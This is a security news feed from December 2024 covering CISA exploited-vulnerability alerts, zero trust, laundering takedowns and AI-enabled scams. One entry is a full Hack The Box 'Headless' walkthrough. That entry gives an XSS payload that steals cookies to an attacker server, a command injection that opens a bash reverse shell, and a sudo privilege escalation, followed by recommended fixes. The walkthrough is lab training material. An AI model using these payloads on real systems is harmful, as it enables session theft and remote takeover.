CISA Warns of Active Exploitation of Flaws in Zyxel, ProjectSend, and CyberPanel
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added multiple security flaws affecting products from Zyxel, North Grid Proself, ProjectSend, and CyberPanel to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The list of vulnerabilities is as follows - CVE-2024-51378 (CVSS score: 10.0) - An incorrect default permissions
by The Hacker News
2024-12-05 10:32:58
Download: The Ultimate Guide to the CCSP
Even the brightest minds benefit from guidance on the journey to success. The Ultimate Guide to the CCSP covers everything you need to know about the world's leading cloud security certification. Learn how CCSP – and ISC2 – can help you discover your certification path, create your plan and distinguish you as a top-level cybersecurity expert. It's all inside: Is CCSP right for me? CCSPs in the community Benefits of CCSP certification Benefits of ISC2 … More → The post Download: The Ultimate Guide to the CCSP appeared first on Help Net Security.
by Help Net Security
2024-12-05 10:32:31
How to guard against webcam and microphone tracking | Kaspersky official blog
Do you need to tape over your camera in 2024?
by Kaspersky
2024-12-05 10:03:00
Are you on the naughty or nice list for responsible AI adoption?
by ComputerWeekly
2024-12-05 10:02:12
Latrodectus malware and how to defend against it with Wazuh
Latrodectus is a versatile malware family that infiltrates systems, steals sensitive data, and evades detection. Learn more from Wazuh about Latrodectus malware and how to defend against it using the open-source XDR. [...]
by BleepingComputer
2024-12-05 10:00:52
Our secret ingredient for reverse engineering
Kaspersky researchers demonstrate capabilities of hrtng plugin for IDA Pro, share tips on working with IDA and reverse engineer FinSpy malware with these tools.
by Securelist
2024-12-05 10:00:00
Harness the Cloud: Critical Benefits of Cloud Computing
Unlock the power of the cloud for your business. Explore advantages from resilience to cost savings, and trends shaping the cloud-dominant future.
by ITPro Today
2024-12-05 09:56:28
Keeper Introduces Risk Management Dashboard for Enhanced Risk Visibility and Proactive Threat Mitigation
Keeper Security have announced the launch of Risk Management Dashboard, a new feature within the Keeper Admin Console. The dashboard empowers administrators with broad visibility into their organisation's security practices and compliance posture, setting a new standard for streamlined cybersecurity management. The Risk Management Dashboard provides an intuitive risk assessment score based on key metrics […] The post Keeper Introduces Risk Management Dashboard for Enhanced Risk Visibility and Proactive Threat Mitigation appeared first on IT Security Guru.
by IT Security Guru
2024-12-05 09:17:33
Russia-linked APT Secret Blizzard spotted using infrastructure of other threat actors
Russia-linked APT group Secret Blizzard has used the tools and infrastructure of at least 6 other threat actors during the past 7 years. Researchers from Microsoft Threat Intelligence collected evidence that the Russia-linked APT group Secret Blizzard (aka Turla, Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has used the tools and infrastructure of at least 6 other threat actors during the […]
by Security Affairs
2024-12-05 09:03:00
T-Mobile undeterred as telecom sector reels from attack campaign
Cybersecurity Dive spoke with CSO Jeff Simon about how the carrier says it thwarted a threat group resembling Salt Typhoon despite its past security failures.
by Cybersecurity Dive
2024-12-05 09:00:00
Making Zero Trust Architecture Achievable
How NIST is working with Tenable and other private sector stakeholders to better enable zero trust implementation.

Trust no one. Verify everything. All the time. When it comes to cybersecurity and protecting your expanding attack surface, that's more than a catchphrase. It's the way you must approach access to your network, systems and assets. Ultimately, this is an approach the federal government must use, expand upon and intertwine into its cybersecurity standards.

When thinking about zero trust, it's important to understand this is an evolving practice that goes beyond traditional "trust but verify" approaches to cybersecurity. According to a Tenable blog by John Kindervag, who created the Zero Trust Model of Cybersecurity when he was a principal analyst at Forrester Research, "While the zero trust model represents a significant divergence from the legacy, moat-and-castle approach to network security, it can be implemented by practitioners using commercial off-the-shelf technology. And it's built upon current cyber best practices and sound cyber hygiene, such as vulnerability management, proactive patching and continuous monitoring, already implemented in most organizations today."

It's time to rethink the trust-but-verify model of cybersecurity

The principles of zero trust require rethinking the trust-but-verify model upon which so much IT infrastructure has been built. It calls for viewing trust as a vulnerability instead and calls for removing the notion of trust from digital systems.

Zero trust is a proactive cybersecurity approach. However, with anything proactive, it's important to remember there is a constant need for adaptation and new protocols that can withstand the changing threat landscape.

On Dec. 4, NIST released the draft Guidance for Implementing Zero Trust Architecture for public comment. Tenable has been proud to work alongside the NIST National Cybersecurity Center of Excellence (NCCoE) to launch the Zero Trust Architecture Demonstration Project. This collaborative project has brought together multiple industry participants to launch end-to-end zero trust architecture implementations to help industry and government reduce the risk of cyberattacks. As part of this collaborative project, Tenable has participated in a lab demonstration of how to deploy examples of zero trust architecture in hybrid enterprise environments using commercially available technology contributions.

"The NCCoE ZTA demonstration project, 'Implementing a Zero Trust Architecture,' stands as a critical cybersecurity initiative that showcases the resilience of ZTAs across multiple practical implementations," explained Alper Kerman, Security Engineer and Principal Lead of the NCCoE Zero Trust Project at NIST. "Each implementation combines a strategic mix of commercially available products and services, contributed by partner organizations such as Tenable. Their invaluable role in providing enhanced visibility and insights has been essential in strengthening our defenses, ensuring we can safeguard our networks against the ever-evolving landscape of cyberthreats."

As a main collaborator, Tenable contributed exposure management technology and capabilities for the ZTA Demonstration Project. As a leader in cybersecurity, Tenable was able to harness its expertise to best use security analytics, building out a program that had orchestration and enforcement capabilities through scanning and assessment, endpoint monitoring, traffic inspection and network discovery.

When implementing a zero trust architecture, it is a foundational imperative for organizations and enterprises to inventory, enumerate and assess every asset on the network. This allows for a better understanding of assets in context and how they are interconnected. Analyzing data from operational technology (OT), internet of things (IoT), IT, cloud and network plays a critical role in helping organizations gain visibility into how assets are interconnected, evaluate exposure based on real-world threats and context, and prioritize remediation and mitigation efforts. Ultimately, it's important for an organization to completely understand the entire attack surface in order to evaluate which assets are most vulnerable. Zero trust architecture is a way to programmatically collect risk telemetry and make informed decisions that can help reduce exposure. By adopting zero trust architecture approaches, it is possible to make significant progress toward this objective.

At Tenable, we are proud to partner with our government's leading agencies to develop strategic ways to approach cybersecurity practices. Our technology solutions help the NCCoE develop a use case that exemplifies the ZTA motto — Trust no one. Verify everything. All the time. Organizations, enterprises and federal agencies need a security model that adapts to today's modern network, embraces remote work and protects users, applications and data wherever they're located. The NCCoE ZTA practice guide and reference architecture can serve as an outstanding model to help them achieve their cybersecurity objectives.

Learn more
View the updated draft Guidance for Implementing a Zero Trust Architecture, released by NIST on Dec. 4
Find out more about the Zero Trust Architecture demonstration project
Download the SANS Institute white paper Navigating the Path to a State of Zero Trust in 2024
by Tenable
2024-12-05 08:35:28
Headless HTB writeup

Initial Access

Task 1: Which is the highest open TCP port on the target machine?

Let's start off with a simple nmap scan with the obvious flags; we find the highest port to be 5000.

nmap -p- --min-rate 10000 10.129.71.97 -A -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 08:30 CST
Nmap scan report for headless.htb (10.129.71.97)
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_  256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
5000/tcp open  upnp?
snip

Answer: 5000

Task 2: What is the title of the page that comes up if the site detects an attack in the contact support form?

We visit the website on port 5000 (as always, add the host headless.htb to your /etc/hosts configuration file). We see a portal. Hmm, let's take a pause and think for a while: in order to get the message from the title page, we need to perform some attack. We can go down the rabbit hole and start with sqli, but it won't lead us anywhere. Let's perform a simple xss attack and see what happens. We get the following error message.

Answer: Hacking Attempt Detected

Task 3: What is the name of the cookie that is set for a logged in user on the site?

There are a couple of ways to find the answer for this: an nmap scan with default scripts (-sC) gives the answer, or you can check cookies by inspecting the browser or using a cookie extension, and last but not least the cookie is displayed in the previous image.

Answer: is_admin

Task 4: What is the relative url of the page on Headless that requires authorization to access?

For this we need to perform directory brute forcing and look out for http status codes apart from 200.
└──╼ [★]$ feroxbuster --url http://headless.htb:5000/

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `  /  \ \_/ | | \ |__
|    |___ |  \ |  \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://headless.htb:5000/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        5l       31w      207c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       93l      179w     2363c http://headless.htb:5000/support
200      GET       96l      259w     2799c http://headless.htb:5000/
500      GET        5l       37w      265c http://headless.htb:5000/dashboard
[#####>--------------] - 2m      8885/30001  4m      found:3       errors:0
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_headless_htb:5000_-1733334286.state ...
[#####>--------------] - 2m      8894/30001  4m      found:3       errors:0

Answer: dashboard

Task 5: What is the parameter name on POST requests to /dashboard that has a vulnerability in it?

Let's sit back and connect the dots: /dashboard needs authentication, in task 3 we found the cookie, and in the previous task our xss got blocked. What if we had to use xss to steal the cookie to authenticate to /dashboard? Well, all the previous tasks are now connecting, and hopefully we authenticate and access this endpoint. We can go down the rabbit hole and try bypassing the input. I tried a lot of payloads; as a matter of fact, the following payload worked, but nothing really happens and the page just goes back to its default mode.
&quot;&lt;marquee onstart=fetch('http://10.10.14.94:8000/script.js').then(r=&gt;r.text()).then(eval)&gt;
%26quot%3b%26lt%3bmarquee+onstart%3dfetch('http%3a//10.10.14.94%3a8000/script.js').then(r%3d%26gt%3br.text()).then(eval)%26gt%3b

So instead of injecting the input field, why don't we inject some headers? Well, in our case we will be targeting user-agent, and it really works; it seems there is no validation on headers. Let's try grabbing the cookie from the user. First save the following file as index.php and make sure you put in the victim IP address, which in our case is the target IP address.

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: 10.129.73.149 | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

Now save script.js, and this time put our IP address in this file.

new Image().src='http://10.10.14.119:8000?c='+document.cookie;

Now finally start the php server on your instance and make sure you put your IP address in here.
php -S 10.10.14.94:8000

Now change your http request to something like the following, in which the payload is included in user-agent:

POST /support HTTP/1.1
Host: headless.htb:5000
Content-Length: 197
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://headless.htb:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: <script src=http://10.10.14.94:8000/script.js></script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://headless.htb:5000/support
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
Connection: close

fname=asd&lname=asd&email=asd%40gmail.com&phone=1234567890&message=%26quot%3b%26lt%3bmarquee+onstart%3dfetch('http%3a//10.10.14.94%3a8000/script.js').then(r%3d%26gt%3br.text()).then(eval)%26gt%3b

Now if we have done everything correctly so far, we must get the cookie. Now let's use this cookie to authorise and access /dashboard. Use the following extension to edit the cookie details on /dashboard; this is so much easier than manually changing the cookie from inspecting the browser. https://chromewebstore.google.com/detail/cookie-editor/hlkenndednhfkekhgcdicdfddnkalmdm?hl=en Once we replace the cookie value, we should see /dashboard.
And you can see we have an option to generate a report; if we click that and look for the response in Burp Suite, we find this has the answer for this task.

POST /dashboard HTTP/1.1
Host: headless.htb:5000
Content-Length: 15
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://headless.htb:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://headless.htb:5000/dashboard
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Connection: close

date=2023-09-15

Answer: date

Task 6: What is the name of the user that the web application is running as?

For this we need to get a shell and gain RCE on this box. Well, let's try some commands on this machine. If we add the following payload to the date parameter, we see we have a command injection vulnerability here.

date=2023-09-15 ; id

Now it's time to get a reverse shell. We will be using the following payload. Add the following line of payload to the http request and you should get a shell; make sure you are running your netcat listener on the desired port.

date=2023-09-15 ;bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.94/443+0>%261' ;

└──╼ [★]$ sudo nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.94] from (UNKNOWN) [10.129.71.97] 38522
bash: cannot set terminal process group (1152): Inappropriate ioctl for device
bash: no job control in this shell
dvir@headless:~/app$ whoami
whoami
dvir
dvir@headless:~/app$

Answer: dvir

Task 7: Submit the flag located in the dvir user's home directory.

cat /home/dvir/user.txt

Privilege Escalation

Task 8: What is the full path to the script that dvir can run as any user without a password?
This one has to be obvious: we have to run sudo -l to see what we can run as a user without a password.

dvir@headless:~/app$ sudo -l
Matching Defaults entries for dvir on headless:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User dvir may run the following commands on headless:
    (ALL) NOPASSWD: /usr/bin/syscheck

Answer: syscheck

Task 9: syscheck calls other scripts to collect output. What is the name of the script that is called with a relative path?

Let's have a look at syscheck.

dvir@headless:~/app$ cat /usr/bin/syscheck
cat /usr/bin/syscheck
#!/bin/bash
if [ "$EUID" -ne 0 ]; then
  exit 1
fi
last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"
disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"
load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"
if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null
else
  /usr/bin/echo "Database service is running."
fi
exit 0

You can use chatgpt to analyze and understand the code better. For the sake of brevity we will be omitting this part. To sum up, this code performs the following activities.

Root Check: Ensures the script is run with root privileges.
Kernel Check: Displays the last kernel modification time in /boot.
Disk Space Check: Reports available disk space on the root filesystem.
System Load Check: Outputs system load averages.
Database Initialization

We will be exploiting the latter part of the code, which has the database initialization; if we are able to execute a new shell inside this script then we might be able to get root.

Answer: initdb.sh

Interestingly, when we look around for a file called initdb.sh we find no such file exists.

find ~/app -type f -name "initdb.sh" 2>/dev/null
ps aux | grep "[i]nitdb.sh"

So we have to create a file called initdb.sh and have the script run a bash shell.

echo -e '#!/bin/bash\n/bin/bash' > /tmp/initdb.sh

Give it executable permissions and run the script.

chmod +x /tmp/initdb.sh
sudo /usr/bin/syscheck

Task 10: Submit the flag located in the root user's home directory.

Now we should get the flag.

dvir@headless:/tmp$ sudo /usr/bin/syscheck
sudo /usr/bin/syscheck
Last Kernel Modification Time: 01/02/2024 10:05
Available disk space: 1.9G
System load average: 0.02, 0.07, 0.04
Database service is not running. Starting it...
whoami
root
cat /root/root.txt

Beyond Root

After we got root, in /home we see a directory called app, which has app.py; if we look closely we can see why the xss and command injection occur.

1. Vulnerability in /support Route

Problematic Code:

if ("<" in message and ">" in message) or ("{{" in message and "}}" in message):
    html = render_template('hackattempt.html', request_info=format_request_info(request_info))
    with open(os.path.join(hacking_reports_dir, filename), 'w', encoding='utf-8') as html_file:
        html_file.write(html)
    return html

Here we note the following drawbacks in the code.

Insufficient Filtering: Simple checks for <, > fail against encoded or obfuscated payloads (e.g., %3Cscript%3Ealert(1)%3C/script%3E).
Unfiltered Input in request_info: Malicious user inputs are embedded into the response (hackattempt.html) without sanitization.

2. Vulnerability in /dashboard Route

Problematic Code:

script_output = os.popen(f'bash report.sh {date}').read()

Here this code leads to a command injection vulnerability.
Unsanitized date parameter enables injection (e.g., 2023-12-01; rm -rf /).

3. Misuse of is_admin Cookie in /dashboard

Problematic Code:

if serializer.loads(request.cookies.get('is_admin')) == "user":
    return abort(401)

Cookie Tampering: If app.secret_key is compromised, attackers can forge cookies to escalate privileges.

Recommendations

Sanitize user input. Use a library like Bleach:

import bleach
message = bleach.clean(request.form.get('message'))

Make use of escaped outputs. Use Jinja2's escaping ({{ variable | e }}).

To prevent command injection, replace os.popen with subprocess.run:

import subprocess
script_output = subprocess.run(['bash', 'report.sh', date], capture_output=True, text=True).stdout

Use secure cookies. Replace client-side cookies with server-side sessions:

session['is_admin'] = True
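To show the two /support and /dashboard fixes above working together, here is an added example written for this page (it is not the box's app.py and not the writeup author's code). The `date` field is checked against an allowlist before anything runs and is then passed to `subprocess.run` as its own argv element, so the `; id` style of payload used earlier is rejected and, even without the check, would reach the child process as literal text rather than a shell command. Every reflected request field, headers such as User-Agent included, is escaped with `html.escape` from the standard library, which stands in for Bleach or Jinja2's `| e`. The `report_cmd` default uses `echo` in place of `bash report.sh` (a hypothetical stand-in) so the example runs anywhere, and the request data is constructed inline.

```python
import html
import re
import subprocess
from datetime import date

# Allowlist for the dashboard's `date` field: exactly YYYY-MM-DD and a real calendar date.
DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")


def validate_report_date(value: str) -> bool:
    """True only for a well-formed, valid ISO date; anything extra is rejected."""
    if not DATE_RE.fullmatch(value):
        return False
    try:
        date.fromisoformat(value)
    except ValueError:
        return False
    return True


def build_report_argv(value: str, report_cmd=("bash", "report.sh")) -> list:
    """argv for the report job. The date is one element, never part of a shell
    string, so `;`, `|` or `$(...)` inside it stay inert text."""
    return [*report_cmd, value]


def run_report(value: str, report_cmd=("echo", "report for")) -> str:
    """Validate first, then execute without a shell. `echo` stands in for
    `bash report.sh` (hypothetical default) so the example runs anywhere."""
    if not validate_report_date(value):
        raise ValueError(f"rejected report date: {value!r}")
    result = subprocess.run(build_report_argv(value, report_cmd),
                            capture_output=True, text=True, check=True)
    return result.stdout.strip()


def escape_for_html(value: str) -> str:
    """Stand-in for Bleach / Jinja2's `| e`: escape &, <, >, \" and '."""
    return html.escape(value, quote=True)


def format_request_info(form: dict, headers: dict) -> str:
    """Render every untrusted field, headers such as User-Agent included, escaped.
    Contrast with the original check, which only inspected `message` for < and >."""
    rows = [
        f"<tr><td>{escape_for_html(k)}</td><td>{escape_for_html(v)}</td></tr>"
        for k, v in [*form.items(), *headers.items()]
    ]
    return "<table>" + "".join(rows) + "</table>"


if __name__ == "__main__":
    # Constructed request data, not a real capture.
    print(run_report("2023-09-15"))
    print(build_report_argv("2023-09-15 ; id"))
    print(format_request_info({"message": "hello"},
                              {"User-Agent": "<script src=http://x/script.js></script>"}))
```

The cookie issue from section 3 is not covered here; the fix the writeup gives (server-side `session` state) is the right one, and with it the client never holds a value worth forging.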
by HACKLIDO
2024-12-05 08:29:21
CISA Adds Three Critical Vulnerabilities to KEV Catalog: Immediate Action Urged
The Cybersecurity and Infrastructure Security Agency (CISA) recently updated its Known Exploited Vulnerabilities (KEV) Catalog, adding three critical vulnerabilities that are being actively exploited by cybercriminals. The flaws in these products could lead to unauthorized access, data breaches, and service disruptions if left unaddressed. The newly added vulnerabilities include CVE-2023-45727, which affects North Grid Proself and is related to an improper restriction of XML External Entity (XXE) reference. Another critical flaw, CVE-2024-11680, impacts ProjectSend and is caused by an improper authentication vulnerability. Finally, CVE-2024-11667 affects Zyxel firewalls, where a path traversal vulnerability can be exploited.

CVE-2023-45727: North Grid Proself XXE Vulnerability

The first vulnerability, CVE-2023-45727, affects multiple versions of North Grid's Proself product suite. These include the Proself Enterprise/Standard Edition (versions 5.62 and earlier), Proself Gateway Edition (versions 1.65 and earlier), and Proself Mail Sanitize Edition (versions 1.08 and earlier). This flaw stems from an improper restriction in the XML External Entity (XXE) processing feature. An attacker can exploit this vulnerability by sending specially crafted XML data to the affected systems. If successful, this could allow remote unauthenticated attackers to access arbitrary files on the server, including those containing sensitive account information. The risk is high as the vulnerability could lead to data manipulation or theft, exposing critical organizational data. The flaw was published on October 18, 2023, and it was added to the KEV catalog shortly after due to its potential impact. Organizations using the affected Proself products are strongly urged to apply patches that address this vulnerability and mitigate the risk of exploitation.
CVE-2024-11680: ProjectSend Authentication Bypass The second vulnerability in CISA’s updated KEV catalog is CVE-2024-11680, which affects the ProjectSend file management application. Specifically, versions prior to r1720 are vulnerable to an improper authentication flaw. This vulnerability allows remote attackers to send specially crafted HTTP requests to the options.php file, which enables them to bypass authentication mechanisms. Once authenticated, attackers can make unauthorized changes to the system configuration, including creating new user accounts, uploading malicious content (such as webshells), or embedding harmful JavaScript. With a critical CVSS score of 9.8, this flaw poses online risks for organizations using vulnerable versions of ProjectSend. This vulnerability was published on November 26, 2024, and organizations are advised to immediately update to the latest version to prevent exploitation. CVE-2024-11667: Zyxel Firewalls Path Traversal The third vulnerability, CVE-2024-11667, impacts several Zyxel firewall models, including the ATP series, USG FLEX series, and USG20(W)-VPN series. The vulnerability lies in the web management interface of firmware versions V5.00 through V5.38 for these devices, enabling attackers to perform a path traversal attack. A path traversal vulnerability allows attackers to manipulate file paths in the system, potentially gaining access to sensitive files or uploading malicious files. In the case of these Zyxel firewalls, attackers could exploit this vulnerability to compromise the device’s security. With a CVSS score of 7.5, this flaw is considered high risk but not as critical as the ProjectSend vulnerability. The flaw was published on November 27, 2024, with an update the following day. Organizations using affected Zyxel products should promptly apply security updates to protect against this attack vector. 
Mitigations for Known Exploited Vulnerabilities The inclusion of CVE-2023-45727, CVE-2024-11680, and CVE-2024-11667 in the CISA Known Exploited Vulnerabilities (KEV) Catalog emphasizes the ongoing cybersecurity challenges faced by industries relying on these vulnerable products. These flaws, which span various attack vectors like XML External Entity (XXE) attacks, improper authentication, and path traversal, pose online risks to organizations using these systems for critical operations. To mitigate these vulnerabilities, organizations must prioritize patch management, strengthen authentication practices, conduct regular security audits, and have incident response plans in place. Proactively addressing these vulnerabilities is essential to protect systems from potential exploits, ensuring the continued security and reliability of operations.
by The Cyber Express
2024-12-05 08:19:19
Tenable Patch Management prevents problematic updates
Tenable released Tenable Patch Management, an autonomous patch solution built to close vulnerability exposures in a unified solution. A strategic partnership and integration with Adaptiva provides the foundation of the solution. Vulnerability remediation remains a critical challenge as identifying, testing and installing the countless patches released every day is cumbersome. A recent Tenable report found that only 11% of organizations say they are efficient at vulnerability remediation. The result is that organizations are exposed for … More → The post Tenable Patch Management prevents problematic updates appeared first on Help Net Security.
by Help Net Security
2024-12-05 07:53:22
China-linked APT Salt Typhoon has breached telcos in dozens of countries
China-linked APT group Salt Typhoon has breached telecommunications companies in dozens of countries, US govt warns. President Biden's deputy national security adviser Anne Neuberger said that China-linked APT group Salt Typhoon has breached telecommunications companies in dozens of countries. The Wall Street Journal reported that the senior White House official revealed that at least eight […]
by Security Affairs
2024-12-05 07:17:55
How the NCA Cracked Billion-Dollar Money Laundering Rings Linked to Ransomware Gangs
The UK's National Crime Agency (NCA) has disrupted two extensive Russian money laundering networks that operated across continents, aiding criminals worldwide, including notorious ransomware gangs. Dubbed Operation Destabilise, this multi-agency investigation exposed the workings of the "Smart" and "TGR" networks—criminal enterprises that laundered billions of pounds while facilitating a range of illicit activities, including cybercrime, drug trafficking, and sanctions evasion.

A Coordinated Global Crackdown
The operation, unveiled today, is the culmination of a years-long international investigation led by the NCA and supported by partners such as the US Department of the Treasury's Office of Foreign Assets Control (OFAC), the FBI, and authorities in the UAE, France, and Ireland. To date, it has resulted in 84 arrests, the seizure of over £20 million in cash and cryptocurrency, and the dismantling of a highly advanced criminal infrastructure spanning more than 30 countries. "Operation Destabilise has exposed billion-dollar money laundering networks operating in ways previously unknown to law enforcement," said an NCA spokesperson. "For the first time, we've been able to link Russian elites, crypto-rich cybercriminals, and UK drug gangs under one sprawling criminal web."

Meet the Criminal Networks: Smart and TGR
The investigation centered on two key networks, Smart and TGR, which worked in tandem to provide a seamless money laundering service. Smart, led by Ukrainian George Rossi, specialized in routing illicit funds through complex channels, often converting cash to cryptocurrency to obscure the origin of the money. TGR, controlled by Russian Ekaterina Zhdanova, focused on managing courier networks and facilitating large-scale cash handovers. Zhdanova worked closely with her deputies Khadzi-Murat Magomedov and Nikita Krasnov, who coordinated couriers in the UK and beyond. These networks offered a mutually beneficial service: they helped UK-based drug gangs launder cash, reinvesting it in illegal activities like drug and firearm trafficking, while simultaneously enabling Russian elites and cybercriminals to bypass international sanctions and invest in Western economies.

How the Scheme Worked
At the heart of Smart and TGR's operations was a complex yet effective scheme:
- Cash Collection: Criminal gangs in one country would hand over large sums of illicit cash to couriers.
- Crypto Conversion: The equivalent value in cryptocurrency was transferred to the gangs, enabling them to reinvest in their illegal businesses without moving physical money across borders.
- Global Laundering: The cryptocurrency was then routed through exchanges, including some linked to sanctioned entities, making it virtually untraceable.
Investigators uncovered over 55 cash handover locations across the UK alone. One London-based courier, Fawad Saiedi, laundered £15 million before being sentenced to four years and four months in prison. Other couriers, such as Semen Kuksov and Andrii Dzektsa, facilitated transactions totaling over £12 million in just two months, operating not only in the UK but also across Europe.

Impacts on Cybercrime and Sanctions Evasion
The reach of Smart and TGR extended beyond physical crime. The networks laundered millions for ransomware gangs, including the Ryuk group, which extorted over £27 million from UK victims such as schools, hospitals, and businesses. Additionally, they helped Russian oligarchs bypass financial restrictions, threatening the integrity of Western economies. In one case, TGR moved £2 million into the UK to purchase property for a Russian client, bypassing anti-money laundering checks. Another operation linked the networks to funds transferred out of Russia to support a sanctioned Russian media organization in the UK.

Cracking Down on Dirty Money
The combined efforts of the NCA and international partners have not gone unnoticed. The sanctions announced by OFAC today target six key figures in the networks, including George Rossi, Ekaterina Zhdanova, and Elena Chirkinyan, as well as four businesses associated with TGR. These measures aim to dismantle the networks' financial infrastructure and disrupt their global operations. The operation has also dealt a significant financial blow to the networks, which typically charged low commissions of around 3% for laundering services. With £20 million seized, they would need to process over £700 million in funds just to recover their losses.

A Message to Criminals
The success of Operation Destabilise sends a strong message: the UK is not a safe haven for money laundering. Increased law enforcement activity has already made it more difficult for Russian-speaking laundering networks to operate in London, with many now charging higher commission rates due to heightened risks. Security Minister Dan Jarvis applauded the operation, stating: "Illicit finance inflicts immense harm around the world, and this major global operation marks a significant step against economic crime. The UK and its allies will continue to work together to crack down on illicit finance and the criminality it enables."

A Call for Community Vigilance
The NCA emphasized the role of community intelligence and neighborhood policing in identifying and tackling criminal activities. "Money laundering deprives society of funds that pay for schools, hospitals, and social services," an official noted. "Together, we can ensure crime doesn't pay." By disrupting these networks, the NCA and its partners have struck a blow against not just money laundering but the broader ecosystem of violence, cybercrime, and corruption that it fuels.
by The Cyber Express
2024-12-05 07:00:00
African Law Enforcement Nabs 1,000+ Cybercrime Suspects
Authorities across 19 African countries also dismantled their infrastructure and networks, thanks to cooperation between global law enforcement and private firms.
by Dark Reading
2024-12-05 06:00:00
Mitel MiCollab zero-day flaw gets proof-of-concept exploit
Researchers have uncovered an arbitrary file read zero-day in the Mitel MiCollab collaboration platform, allowing attackers to access files on a server's filesystem. [...]
by BleepingComputer
2024-12-05 05:23:51
Voice Cloning, Fake Videos & More: AI Is Making Scams Unstoppable
The FBI has issued a new warning about the increasing use of artificial intelligence (AI) in online fraud schemes, which are becoming more advanced and difficult to detect. "The FBI is warning the public that criminals exploit generative artificial intelligence (AI) to commit fraud on a larger scale which increases the believability of their schemes," reads the statement released by the FBI. Criminals are leveraging generative AI tools to create highly convincing social media profiles, fraudulent websites, and even audio and video content to deceive victims on a larger scale. These AI technologies make scams more believable and harder to identify, heightening the risks for individuals and businesses alike.

Generative AI refers to tools that can create new content—such as text, images, audio, and videos—based on examples input by users. While the creation of synthetic content itself is not illegal, it can be exploited to facilitate crimes like fraud, extortion, and identity theft. Since generative AI can produce highly realistic content that may seem genuine at first glance, recognizing when a piece of content is AI-generated can be challenging.

How Scammers Use Generative AI in Fraud Schemes
AI-generated text, images, audio, and videos are being used by criminals to manipulate their victims in various ways. Here's how these technologies are making scams more effective:
- AI-Generated Text: Criminals are using AI to create convincing written content that seems legitimate, such as emails, text messages, and social media posts. This helps them reach a larger audience more efficiently while overcoming typical signs of fraud. For example, AI can generate fake social media profiles to engage victims in romance scams, investment fraud, or job hiring schemes. AI-powered tools can also help translate messages into different languages, ensuring that international fraudsters can target victims without grammatical errors that would usually raise suspicion. Scammers are also using generative AI to craft fraudulent investment websites, often for schemes involving cryptocurrency, or to embed chatbots that trick users into clicking malicious links.
- AI-Generated Images: Criminals are using AI to create realistic images that support their fraudulent activities. These images can be used for fake social media profiles or to create phony identification documents. AI tools allow fraudsters to generate photos that appear to be of real people, which they then use to support romance scams, confidence fraud, or fake investment schemes. Some scammers have used AI to produce images of celebrities or social media influencers promoting counterfeit products or fake fundraising campaigns. AI-generated images are also used in extortion schemes, such as creating fake pornographic photos of a victim to blackmail them into paying money.
